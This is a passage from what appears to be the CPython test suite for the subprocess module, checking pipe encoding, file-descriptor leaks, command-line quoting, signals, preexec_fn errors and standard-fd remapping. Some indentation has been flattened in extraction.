    # without, and UTF-16 and UTF-32.
    for encoding in ['utf-16', 'utf-32-be']:
        # Monkey-patch locale.getpreferredencoding so the parent's text
        # pipes decode with the encoding the child writes; the original
        # is restored in the finally block below.
        old_getpreferredencoding = locale.getpreferredencoding
        # Indirectly via io.TextIOWrapper, Popen() defaults to
        # locale.getpreferredencoding(False) and earlier in Python 3.2 to
        # locale.getpreferredencoding().
        def getpreferredencoding(do_setlocale=True):
            return encoding
        code = ("import sys; "
                r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
                encoding)
        args = [sys.executable, '-c', code]
        try:
            locale.getpreferredencoding = getpreferredencoding
            # We set stdin to be non-None because, as of this writing,
            # a different code path is used when the number of pipes is
            # zero or one.
            popen = subprocess.Popen(args, universal_newlines=True,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE)
            stdout, stderr = popen.communicate(input='')
        finally:
            locale.getpreferredencoding = old_getpreferredencoding
        self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
    # Make sure we leak no resources
    # Strategy: exhaust the process's fd limit on purpose, free just a
    # few descriptors, then repeatedly spawn subprocesses -- any fd leak
    # makes a later Popen hit EMFILE and fail.
    if not mswindows:
        max_handles = 1026 # too much for most UNIX systems
    else:
        max_handles = 2050 # too much for (at least some) Windows setups
    handles = []
    tmpdir = tempfile.mkdtemp()
    try:
        for i in range(max_handles):
            try:
                tmpfile = os.path.join(tmpdir, support.TESTFN)
                handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
            except OSError as e:
                if e.errno != errno.EMFILE:
                    raise
                break
        else:
            self.skipTest("failed to reach the file descriptor limit "
                          "(tried %d)" % max_handles)
        # Close a couple of them (should be enough for a subprocess)
        for i in range(10):
            os.close(handles.pop())
        # Loop creating some subprocesses. If one of them leaks some fds,
        # the next loop iteration will fail by reaching the max fd limit.
        for i in range(15):
            p = subprocess.Popen([sys.executable, "-c",
                                  "import sys;"
                                  "sys.stdout.write(sys.stdin.read())"],
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            data = p.communicate(b"lime")[0]
            self.assertEqual(data, b"lime")
    finally:
        for h in handles:
            os.close(h)
        shutil.rmtree(tmpdir)
def test_list2cmdline(self):
    # Each (argv, expected) pair checks the MS C runtime quoting rules
    # implemented by list2cmdline(): spaces force quoting, quotes are
    # backslash-escaped, and backslashes double only before a quote.
    cases = [
        (['a b c', 'd', 'e'], '"a b c" d e'),
        (['ab"c', '\\', 'd'], 'ab\\"c \\ d'),
        (['ab"c', ' \\', 'd'], 'ab\\"c " \\\\" d'),
        (['a\\\\\\b', 'de fg', 'h'], 'a\\\\\\b "de fg" h'),
        (['a\\"b', 'c', 'd'], 'a\\\\\\"b c d'),
        (['a\\\\b c', 'd', 'e'], '"a\\\\b c" d e'),
        (['a\\\\b\\ c', 'd', 'e'], '"a\\\\b\\ c" d e'),
        (['ab', ''], 'ab ""'),
    ]
    for argv, expected in cases:
        self.assertEqual(subprocess.list2cmdline(argv), expected)
def test_poll(self):
    # poll() returns None while the child blocks on stdin; after the
    # write unblocks it and wait() reaps it, poll() returns the cached
    # exit status.
    p = subprocess.Popen([sys.executable, "-c",
                          "import os; os.read(0, 1)"],
                         stdin=subprocess.PIPE)
    self.addCleanup(p.stdin.close)
    self.assertIsNone(p.poll())
    os.write(p.stdin.fileno(), b'A')
    p.wait()
    # Subsequent invocations should just return the returncode
    self.assertEqual(p.poll(), 0)
def test_wait(self):
    # wait() returns the exit status; calling it again just returns the
    # cached returncode.
    proc = subprocess.Popen([sys.executable, "-c", "pass"])
    for _ in range(2):
        self.assertEqual(proc.wait(), 0)
def test_wait_timeout(self):
    # wait(timeout) raises TimeoutExpired (mentioning the timeout value)
    # while the child is still sleeping; a longer wait then succeeds.
    p = subprocess.Popen([sys.executable,
                          "-c", "import time; time.sleep(0.3)"])
    with self.assertRaises(subprocess.TimeoutExpired) as c:
        p.wait(timeout=0.0001)
    self.assertIn("0.0001", str(c.exception))  # For coverage of __str__.
    # Some heavily loaded buildbots (sparc Debian 3.x) require this much
    # time to start.
    self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
    # A non-integer bufsize argument (here a str passed positionally)
    # must raise TypeError.
    self.assertRaises(TypeError, subprocess.Popen,
                      [sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
    # bufsize=None (positionally and by keyword) must behave like the
    # default, i.e. the same as bufsize=0 here.
    procs = [
        subprocess.Popen([sys.executable, "-c", "pass"], None),
        subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None),
    ]
    for proc in procs:
        self.assertEqual(proc.wait(), 0)
def test_leaking_fds_on_error(self):
    # see bug #5179: Popen leaks file descriptors to PIPEs if
    # the child fails to execute; this will eventually exhaust
    # the maximum number of open fds. 1024 seems a very common
    # value for that limit, but Windows has 2048, so we loop
    # 1024 times (each call leaked two fds).
    for i in range(1024):
        # Windows raises IOError. Others raise OSError.
        with self.assertRaises(EnvironmentError) as c:
            subprocess.Popen(['nonexisting_i_hope'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        # ignore errors that indicate the command was not found
        if c.exception.errno not in (errno.ENOENT, errno.EACCES):
            raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
    # Issue #18851
    # A background thread keeps creating pipe fds while Popen fails; if
    # Popen's error path closed an fd twice, it could close one of the
    # thread's freshly-created fds, which os.close() below would detect.
    fds = []
    def open_fds():
        for i in range(20):
            fds.extend(os.pipe())
            time.sleep(0.001)
    t = threading.Thread(target=open_fds)
    t.start()
    try:
        with self.assertRaises(EnvironmentError):
            subprocess.Popen(['nonexisting_i_hope'],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
    finally:
        t.join()
    exc = None
    for fd in fds:
        # If a double close occurred, some of those fds will
        # already have been closed by mistake, and os.close()
        # here will raise.
        try:
            os.close(fd)
        except OSError as e:
            exc = e
    if exc is not None:
        raise exc
def test_issue8780(self):
    # Ensure that stdout is inherited from the parent
    # if stdout=PIPE is not used
    # The grandchild's print must appear on the intermediate child's
    # stdout, which check_output captures here.
    code = ';'.join((
        'import subprocess, sys',
        'retcode = subprocess.call('
        "[sys.executable, '-c', 'print(\"Hello World!\")'])",
        'assert retcode == 0'))
    output = subprocess.check_output([sys.executable, '-c', code])
    self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
    # If CreateProcess exits with an error, ensure the
    # duplicate output handles are released
    # "*" is an invalid program name, so Popen is expected to raise;
    # the temp files must then be closable and removable, proving no
    # handle to them is still held.
    ifhandle, ifname = mkstemp()
    ofhandle, ofname = mkstemp()
    efhandle, efname = mkstemp()
    try:
        subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
                          stderr=efhandle)
    except OSError:
        os.close(ifhandle)
        os.remove(ifname)
        os.close(ofhandle)
        os.remove(ofname)
        os.close(efhandle)
        os.remove(efname)
    self.assertFalse(os.path.exists(ifname))
    self.assertFalse(os.path.exists(ofname))
    self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
    # Issue 10963: communicate() should hide EPIPE
    # The child exits without reading, so writing 1 MiB to its stdin
    # produces EPIPE, which communicate() must swallow.
    p = subprocess.Popen([sys.executable, "-c", 'pass'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    self.addCleanup(p.stdin.close)
    p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
    # Issue 10963: communicate() should hide EPIPE
    # Same as above but on the single-pipe code path, and with the child
    # already reaped before communicate() writes.
    p = subprocess.Popen([sys.executable, "-c", 'pass'],
                         stdin=subprocess.PIPE)
    self.addCleanup(p.stdin.close)
    p.wait()
    p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                     "Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
                     "Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
                     "Requires os.getppid")
def test_communicate_eintr(self):
    # Issue #12493: communicate() should handle EINTR
    # The child signals the parent (us) with SIGUSR1 while the parent is
    # blocked in communicate(); the no-op handler makes the underlying
    # syscall return EINTR, which communicate() must retry.
    def handler(signum, frame):
        pass
    old_handler = signal.signal(signal.SIGUSR1, handler)
    self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
    args = [sys.executable, "-c",
            'import os, signal;'
            'os.kill(os.getppid(), signal.SIGUSR1)']
    for stream in ('stdout', 'stderr'):
        kw = {stream: subprocess.PIPE}
        with subprocess.Popen(args, **kw) as process:
            # communicate() will be interrupted by SIGUSR1
            process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
                     "Linux specific")
def test_failed_child_execute_fd_leak(self):
    """Test for the fork() failure fd leak reported in issue16327."""
    # Compare the /proc fd listing before and after a Popen whose
    # _execute_child raises: no descriptors may remain open.
    fd_directory = '/proc/%d/fd' % os.getpid()
    fds_before_popen = os.listdir(fd_directory)
    with self.assertRaises(PopenTestException):
        PopenExecuteChildRaises(
            [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # NOTE: This test doesn't verify that the real _execute_child
    # does not close the file descriptors itself on the way out
    # during an exception. Code inspection has confirmed that.
    fds_after_exception = os.listdir(fd_directory)
    self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
    """Try to prevent core files from being created."""
    # Saved (soft, hard) RLIMIT_CORE tuple, or None if it could not be
    # read/changed; __exit__ only restores when a save succeeded.
    old_limit = None

    def __enter__(self):
        """Try to save previous ulimit, then set it to (0, 0)."""
        if resource is not None:
            try:
                self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
                resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
            except (ValueError, resource.error):
                # best effort only -- leave old_limit as None
                pass
        if sys.platform == 'darwin':
            # Check if the 'Crash Reporter' on OSX was configured
            # in 'Developer' mode and warn that it will get triggered
            # when it is.
            #
            # This assumes that this context manager is used in tests
            # that might trigger the next manager.
            value = subprocess.Popen(['/usr/bin/defaults', 'read',
                                      'com.apple.CrashReporter', 'DialogType'],
                                     stdout=subprocess.PIPE).communicate()[0]
            if value.strip() == b'developer':
                print("this tests triggers the Crash Reporter, "
                      "that is intentional", end='')
                sys.stdout.flush()

    def __exit__(self, *args):
        """Return core file behavior to default."""
        if self.old_limit is None:
            return
        if resource is not None:
            try:
                resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
            except (ValueError, resource.error):
                pass
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
    super().setUp()
    # A path guaranteed not to exist; used by the chdir/exec failure
    # tests below.
    self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
    # Helper: produce the exact OSError that chdir()ing into the
    # nonexistent directory raises, for later comparison with the error
    # Popen reports from the child.
    try:
        os.chdir(self._nonexistent_dir)
    except OSError as e:
        # This avoids hard coding the errno value or the OS perror()
        # string and instead capture the exception that we want to see
        # below for comparison.
        desired_exception = e
        desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
    else:
        self.fail("chdir to nonexistant directory %s succeeded." %
                  self._nonexistent_dir)
    return desired_exception
def test_exception_cwd(self):
    """Test error in the child raised in the parent for a bad cwd."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             cwd=self._nonexistent_dir)
    except OSError as e:
        # Test that the child process chdir failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
    """Test error in the child raised in the parent for a bad executable."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             executable=self._nonexistent_dir)
    except OSError as e:
        # Test that the child process exec failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
    """Test error in the child raised in the parent for a bad args[0]."""
    desired_exception = self._get_chdir_exception()
    try:
        p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
    except OSError as e:
        # Test that the child process exec failure actually makes
        # it up to the parent process as the correct exception.
        self.assertEqual(desired_exception.errno, e.errno)
        self.assertEqual(desired_exception.strerror, e.strerror)
    else:
        self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
    # Code coverage for both values of restore_signals; this only checks
    # that the calls do not blow up.  A behavioral test would be complex
    # -- contributions welcome.
    for restore in (True, False):
        subprocess.call([sys.executable, "-c", ""],
                        restore_signals=restore)
def test_start_new_session(self):
    # For code coverage of calling setsid(). We don't care if we get an
    # EPERM error from it depending on the test execution environment, that
    # still indicates that it was called.
    try:
        output = subprocess.check_output(
                [sys.executable, "-c",
                 "import os; print(os.getpgid(os.getpid()))"],
                start_new_session=True)
    except OSError as e:
        if e.errno != errno.EPERM:
            raise
    else:
        # setsid() gives the child its own process group, which must
        # differ from the parent's.
        parent_pgid = os.getpgid(os.getpid())
        child_pgid = int(output)
        self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
    # returncode handles signal termination
    # os.abort() raises SIGABRT; Popen encodes death-by-signal as a
    # negative returncode.
    with _SuppressCoreFiles():
        p = subprocess.Popen([sys.executable, "-c",
                              'import os; os.abort()'])
        p.wait()
    self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
    # DISCLAIMER: Setting environment variables is *not* a good use
    # of a preexec_fn. This is merely a test.
    # The preexec_fn runs in the child after fork() and before exec(),
    # so the putenv must be visible to the exec'd Python.
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys,os;'
                          'sys.stdout.write(os.getenv("FRUIT"))'],
                         stdout=subprocess.PIPE,
                         preexec_fn=lambda: os.putenv("FRUIT", "apple"))
    self.addCleanup(p.stdout.close)
    self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
    # An exception raised inside preexec_fn (i.e. in the child, between
    # fork and exec) must be reported to the parent.  With the C
    # _posixsubprocess accelerator it surfaces as RuntimeError; the pure
    # Python fallback re-raises the original ValueError.
    def raise_it():
        raise ValueError("What if two swallows carried a coconut?")
    try:
        p = subprocess.Popen([sys.executable, "-c", ""],
                             preexec_fn=raise_it)
    except RuntimeError as e:
        self.assertTrue(
                subprocess._posixsubprocess,
                "Expected a ValueError from the preexec_fn")
    except ValueError as e:
        self.assertIn("coconut", e.args[0])
    else:
        self.fail("Exception raised by preexec_fn did not make it "
                  "to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
    """Used to test behavior at the end of _execute_child."""
    def __init__(self, testcase, *args, **kwargs):
        # Keep the TestCase so _execute_child can make assertions.
        self._testcase = testcase
        subprocess.Popen.__init__(self, *args, **kwargs)

    def _execute_child(self, *args, **kwargs):
        try:
            subprocess.Popen._execute_child(self, *args, **kwargs)
        finally:
            # Open a bunch of file descriptors and verify that
            # none of them are the same as the ones the Popen
            # instance is using for stdin/stdout/stderr.
            # (Freshly opened fds reuse the lowest free numbers, so a
            # prematurely closed pipe fd would show up here.)
            devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
                           for _ in range(8)]
            try:
                for fd in devzero_fds:
                    self._testcase.assertNotIn(
                            fd, (self.stdin.fileno(), self.stdout.fileno(),
                                 self.stderr.fileno()),
                            msg="At least one fd was closed early.")
            finally:
                for fd in devzero_fds:
                    os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
    """Issue16140: Don't double close pipes on preexec error."""
    # The raising preexec_fn forces the errpipe_data error path in
    # _execute_child; the _TestExecuteChildPopen subclass above then
    # verifies the stdio fds were not closed early.
    def raise_it():
        raise RuntimeError("force the _execute_child() errpipe_data path.")
    with self.assertRaises(RuntimeError):
        self._TestExecuteChildPopen(
                self, [sys.executable, "-c", "pass"],
                stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
    # This tests the code that disables garbage collection if the child
    # process will execute any Python.
    # Popen with a preexec_fn disables gc around fork() and re-enables
    # it afterwards only if it was enabled before; failures in the gc
    # API itself must propagate.  The finally block restores the real
    # gc functions and the original enabled state.
    def raise_runtime_error():
        raise RuntimeError("this shouldn't escape")
    enabled = gc.isenabled()
    orig_gc_disable = gc.disable
    orig_gc_isenabled = gc.isenabled
    try:
        gc.disable()
        self.assertFalse(gc.isenabled())
        subprocess.call([sys.executable, '-c', ''],
                        preexec_fn=lambda: None)
        self.assertFalse(gc.isenabled(),
                         "Popen enabled gc when it shouldn't.")
        gc.enable()
        self.assertTrue(gc.isenabled())
        subprocess.call([sys.executable, '-c', ''],
                        preexec_fn=lambda: None)
        self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
        gc.disable = raise_runtime_error
        self.assertRaises(RuntimeError, subprocess.Popen,
                          [sys.executable, '-c', ''],
                          preexec_fn=lambda: None)
        del gc.isenabled  # force an AttributeError
        self.assertRaises(AttributeError, subprocess.Popen,
                          [sys.executable, '-c', ''],
                          preexec_fn=lambda: None)
    finally:
        gc.disable = orig_gc_disable
        gc.isenabled = orig_gc_isenabled
        if not enabled:
            gc.disable()
def test_args_string(self):
    # args is a string
    # On POSIX a string args is executed directly (no shell), so a
    # self-executing shell script is used as the program.
    fd, fname = mkstemp()
    # reopen in text mode
    with open(fd, "w", errors="surrogateescape") as fobj:
        fobj.write("#!/bin/sh\n")
        fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                   sys.executable)
    os.chmod(fname, 0o700)
    p = subprocess.Popen(fname)
    p.wait()
    os.remove(fname)
    self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
    # The Windows-only startupinfo/creationflags arguments must be
    # rejected with ValueError on POSIX.
    for bad_kwargs in ({"startupinfo": 47}, {"creationflags": 47}):
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          **bad_kwargs)
def test_shell_sequence(self):
    # Run command through the shell (sequence): the shell must expand
    # $FRUIT from the env= environment.
    newenv = os.environ.copy()
    newenv["FRUIT"] = "apple"
    # shell=True, not the truthy literal 1 -- this is the documented
    # boolean flag.
    p = subprocess.Popen(["echo $FRUIT"], shell=True,
                         stdout=subprocess.PIPE,
                         env=newenv)
    self.addCleanup(p.stdout.close)
    self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
    # Run command through the shell (string): same as the sequence form,
    # but args given as a single string.
    newenv = os.environ.copy()
    newenv["FRUIT"] = "apple"
    # shell=True, not the truthy literal 1 -- this is the documented
    # boolean flag.
    p = subprocess.Popen("echo $FRUIT", shell=True,
                         stdout=subprocess.PIPE,
                         env=newenv)
    self.addCleanup(p.stdout.close)
    self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
    # call() function with string argument on UNIX
    fd, fname = mkstemp()
    # reopen in text mode
    with open(fd, "w", errors="surrogateescape") as fobj:
        fobj.write("#!/bin/sh\n")
        fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                   sys.executable)
    os.chmod(fname, 0o700)
    rc = subprocess.call(fname)
    os.remove(fname)
    self.assertEqual(rc, 47)
def test_specific_shell(self):
    # Issue #9265: Incorrect name passed as arg[0].
    # With shell=True and executable=sh, $0 in the shell must be the
    # chosen shell's path.
    shells = []
    for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
        for name in ['bash', 'ksh']:
            sh = os.path.join(prefix, name)
            if os.path.isfile(sh):
                shells.append(sh)
    if not shells: # Will probably work for any shell but csh.
        self.skipTest("bash or ksh required for this test")
    sh = '/bin/sh'
    if os.path.isfile(sh) and not os.path.islink(sh):
        # Test will fail if /bin/sh is a symlink to csh.
        shells.append(sh)
    for sh in shells:
        p = subprocess.Popen("echo $0", executable=sh, shell=True,
                             stdout=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
    # Helper: start a child that sleeps for a long time, wait until it is
    # fully initialized (it prints 'x'), then invoke the given Popen
    # method ('kill', 'terminate', 'send_signal') on it.
    # Do not inherit file handles from the parent.
    # It should fix failures on some platforms.
    # Also set the SIGINT handler to the default to make sure it's not
    # being ignored (some tests rely on that.)
    old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
    try:
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             close_fds=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
    finally:
        signal.signal(signal.SIGINT, old_handler)
    # Wait for the interpreter to be completely initialized before
    # sending any signal.
    p.stdout.read(1)
    getattr(p, method)(*args)
    return p
# NOTE(review): this skipIf decorates a helper rather than a test_*
# method; it presumably takes effect by raising SkipTest when the helper
# is called from the *_dead tests below -- confirm that is intended.
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
                 "Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
    # Helper: start a child that exits immediately, wait for it to die,
    # then invoke the given Popen method on the already-dead process --
    # which must not raise.
    # Do not inherit file handles from the parent.
    # It should fix failures on some platforms.
    p = subprocess.Popen([sys.executable, "-c", """if 1:
                         import sys, time
                         sys.stdout.write('x\\n')
                         sys.stdout.flush()
                         """],
                         close_fds=True,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    # Wait for the interpreter to be completely initialized before
    # sending any signal.
    p.stdout.read(1)
    # The process should end after this
    time.sleep(1)
    # This shouldn't raise even though the child is now dead
    getattr(p, method)(*args)
    p.communicate()
def test_send_signal(self):
    # SIGINT with the default handler makes the child die with a
    # KeyboardInterrupt traceback and a nonzero status.
    p = self._kill_process('send_signal', signal.SIGINT)
    _, stderr = p.communicate()
    self.assertIn(b'KeyboardInterrupt', stderr)
    self.assertNotEqual(p.wait(), 0)
def test_kill(self):
    # kill() delivers SIGKILL: no stderr output, negative returncode.
    p = self._kill_process('kill')
    _, stderr = p.communicate()
    self.assertStderrEqual(stderr, b'')
    self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
    # terminate() delivers SIGTERM: no stderr output, negative returncode.
    p = self._kill_process('terminate')
    _, stderr = p.communicate()
    self.assertStderrEqual(stderr, b'')
    self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
    # Sending a signal to a dead process must not raise.
    self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
    # Killing a dead process must not raise.
    self._kill_dead_process('kill')
def test_terminate_dead(self):
    # Terminating a dead process must not raise.
    self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
    # Pipes must still work with stdin (fd 0) closed.
    self.check_close_std_fds([0])
def test_close_fd_1(self):
    # Pipes must still work with stdout (fd 1) closed.
    self.check_close_std_fds([1])
def test_close_fd_2(self):
    # Pipes must still work with stderr (fd 2) closed.
    self.check_close_std_fds([2])
def test_close_fds_0_1(self):
    # Pipes must still work with fds 0 and 1 closed.
    self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
    # Pipes must still work with fds 0 and 2 closed.
    self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
    # Pipes must still work with fds 1 and 2 closed.
    self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
    # Issue #10806: test that subprocess pipes still work properly with
    # all standard fds closed.
    self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
    """Issue #15798: Popen should work when stdio fds are available."""
    # Closing fds 0 and 1 makes the internal errpipe land on a low fd
    # number; Popen must still spawn correctly.
    new_stdin = os.dup(0)
    new_stdout = os.dup(1)
    try:
        os.close(0)
        os.close(1)
        # Side test: if errpipe_write fails to have its CLOEXEC
        # flag set this should cause the parent to think the exec
        # failed. Extremely unlikely: everyone supports CLOEXEC.
        subprocess.Popen([
                sys.executable, "-c",
                "print('AssertionError:0:CLOEXEC failure.')"]).wait()
    finally:
        # Restore original stdin and stdout
        os.dup2(new_stdin, 0)
        os.dup2(new_stdout, 1)
        os.close(new_stdin)
        os.close(new_stdout)
def test_remapping_std_fds(self):
    # open up some temporary files
    temps = [mkstemp() for i in range(3)]
    try:
        temp_fds = [fd for fd, fname in temps]

        # unlink the files -- we won't need to reopen them
        for fd, fname in temps:
            os.unlink(fname)

        # write some data to what will become stdin, and rewind
        os.write(temp_fds[1], b"STDIN")
        os.lseek(temp_fds[1], 0, 0)

        # move the standard file descriptors out of the way
        saved_fds = [os.dup(fd) for fd in range(3)]
        try:
            # duplicate the file objects over the standard fd's
            for fd, temp_fd in enumerate(temp_fds):
                os.dup2(temp_fd, fd)

            # now use those files in the "wrong" order, so that subprocess
            # has to rearrange them in the child
            p = subprocess.Popen([sys.executable, "-c",
                'import sys; got = sys.stdin.read();'
                'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                stdin=temp_fds[1],
                stdout=temp_fds[2],
                stderr=temp_fds[0])
            p.wait()
        finally:
            # restore the original fd's underneath sys.stdin, etc.
            for std, saved in enumerate(saved_fds):
                os.dup2(saved, std)
                os.close(saved)

        # Rewind and verify the child's output landed in the scrambled files.
        for fd in temp_fds:
            os.lseek(fd, 0, 0)

        out = os.read(temp_fds[2], 1024)
        err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
        self.assertEqual(out, b"got STDIN")
        self.assertEqual(err, b"err")

    finally:
        for fd in temp_fds:
            os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
    # Map three temp files over fds 0/1/2, then ask subprocess to use them
    # as stdin/stdout/stderr in the caller-supplied (possibly swapped)
    # order; the child-side dup2 logic must not clobber any of them.
    # open up some temporary files
    temps = [mkstemp() for i in range(3)]
    temp_fds = [fd for fd, fname in temps]
    try:
        # unlink the files -- we won't need to reopen them
        for fd, fname in temps:
            os.unlink(fname)

        # save a copy of the standard file descriptors
        saved_fds = [os.dup(fd) for fd in range(3)]
        try:
            # duplicate the temp files over the standard fd's 0, 1, 2
            for fd, temp_fd in enumerate(temp_fds):
                os.dup2(temp_fd, fd)

            # write some data to what will become stdin, and rewind
            # (stdin_no is one of 0/1/2, which now refers to a temp file)
            os.write(stdin_no, b"STDIN")
            os.lseek(stdin_no, 0, 0)

            # now use those files in the given order, so that subprocess
            # has to rearrange them in the child
            p = subprocess.Popen([sys.executable, "-c",
                'import sys; got = sys.stdin.read();'
                'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                stdin=stdin_no,
                stdout=stdout_no,
                stderr=stderr_no)
            p.wait()

            for fd in temp_fds:
                os.lseek(fd, 0, 0)

            out = os.read(stdout_no, 1024)
            err = support.strip_python_stderr(os.read(stderr_no, 1024))
        finally:
            # Restore the real 0/1/2 before asserting, so test output works.
            for std, saved in enumerate(saved_fds):
                os.dup2(saved, std)
                os.close(saved)

        self.assertEqual(out, b"got STDIN")
        self.assertEqual(err, b"err")
    finally:
        for fd in temp_fds:
            os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
    # Every permutation of mapping the three temp files onto std fds.
    self.check_swap_fds(0, 1, 2)
    self.check_swap_fds(0, 2, 1)
    self.check_swap_fds(1, 0, 2)
    self.check_swap_fds(1, 2, 0)
    self.check_swap_fds(2, 0, 1)
    self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
    # A preexec_fn raising a message that contains surrogate characters
    # must not break the parent's error reporting, whichever subprocess
    # implementation (pure Python or _posixsubprocess) is in use.
    def prepare():
        raise ValueError("surrogate:\uDCff")

    try:
        subprocess.call(
            [sys.executable, "-c", "pass"],
            preexec_fn=prepare)
    except ValueError as err:
        # Pure Python implementations keep the original message
        self.assertIsNone(subprocess._posixsubprocess)
        self.assertEqual(str(err), "surrogate:\uDCff")
    except RuntimeError as err:
        # _posixsubprocess uses a default message
        self.assertIsNotNone(subprocess._posixsubprocess)
        self.assertEqual(str(err), "Exception occurred in preexec_fn.")
    else:
        self.fail("Expected ValueError or RuntimeError")
def test_undecodable_env(self):
    # Environment variable names/values containing surrogate-escaped bytes
    # must round-trip to the child process, both as str and as bytes.
    for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
        # test str with surrogates
